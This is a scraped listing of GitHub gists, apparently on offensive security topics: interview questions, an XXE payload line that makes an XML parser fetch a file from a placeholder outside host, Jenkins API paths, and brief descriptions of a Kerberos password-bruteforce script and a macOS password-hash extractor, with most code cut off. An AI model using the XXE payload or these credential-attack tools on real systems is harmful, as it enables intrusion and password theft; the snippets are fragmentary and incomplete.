

Chris Gates carnal0wnage

namishelex01 / Security Engineer - Interview Questions
Last active Jun 17, 2021
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
> What is information security and how is it achieved?
> What are the core principles of information security?
> What is non-repudiation (as it applies to IT security)?
> What is the relationship between information security and data availability?
> What is a security policy and why do we need one?
XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">


jenkins_url + /api/json?tree=jobs[name,color]


jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build

ropnop /
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
teddziuba /
Last active Jun 6, 2021
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
#!/usr/bin/env python3
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
jhaddix / Github bash generated search links (from
Created Jan 12, 2020
n0531m /
Last active Jun 2, 2021
Google Cloud Platform : ip address range
# nslookup -q=TXT
for LINE in `dig txt +short | tr " " "\n" | grep include | cut -f 2 -d :`
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`